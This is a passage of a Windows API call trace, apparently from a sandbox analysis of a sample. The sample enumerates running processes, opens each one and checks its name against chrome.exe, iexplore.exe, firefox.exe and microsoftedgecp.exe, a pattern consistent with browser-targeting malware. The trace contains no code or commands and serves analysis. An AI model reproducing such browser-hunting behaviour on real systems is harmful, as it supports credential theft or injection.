	[0254.361] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.362] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.362] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xabe0
	[0254.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.363] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.364] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.364] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.364] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.364] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xabe4
	[0254.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.365] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.366] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.366] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.366] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.367] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xabe8
	[0254.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.368] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.368] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.368] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.369] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.369] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.369] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xabec
	[0254.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.370] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.370] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.370] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.371] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xabf0
	[0254.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.372] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.372] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.372] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.373] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.373] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0254.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xabf4
	[0254.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.374] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0254.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.375] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.375] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0254.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.375] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.376] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xabf8
	[0254.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.376] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.377] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.377] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.378] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.378] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0254.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xabfc
	[0254.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.379] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.380] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.380] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.381] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.381] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0254.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xac00
	[0254.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.382] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0254.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.382] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.383] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0254.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.383] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.383] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0254.384] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xac04
	[0254.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.384] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0254.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.384] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.385] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0254.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.385] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0254.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xac08
	[0254.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.386] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0254.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.387] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.387] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0254.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.387] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.388] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0254.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xac0c
	[0254.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.388] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0254.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.389] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.389] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0254.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.389] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.390] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0254.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xac10
	[0254.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.391] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0254.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.391] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.391] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0254.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.391] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0254.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xac14
	[0254.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.393] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0254.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.393] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.393] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0254.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.394] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.394] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0254.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0254.395] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0254.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xac18
	[0254.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.396] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0254.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.396] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.397] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0254.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.397] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.398] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0254.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xac1c
	[0254.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.399] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0254.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.399] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.399] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0254.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.400] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0254.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xac20
	[0254.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.401] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0254.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.401] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.402] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0254.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.402] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.402] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0254.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xac24
	[0254.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.403] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0254.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.403] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.404] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0254.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.404] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.404] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0254.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xac28
	[0254.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.405] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0254.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.406] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.406] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0254.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.407] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.407] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0254.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xac2c
	[0254.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.408] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0254.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.409] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.409] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0254.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.409] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0254.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xac30
	[0254.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.410] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0254.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.411] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.411] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0254.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.412] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.412] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0254.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xac34
	[0254.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.413] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0254.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.413] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.414] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0254.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.414] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0254.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xac38
	[0254.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.416] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0254.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.416] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.416] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0254.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.416] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0254.416] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0254.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xac3c
	[0254.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.417] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0254.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.418] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0254.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.418] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0254.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0254.418] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
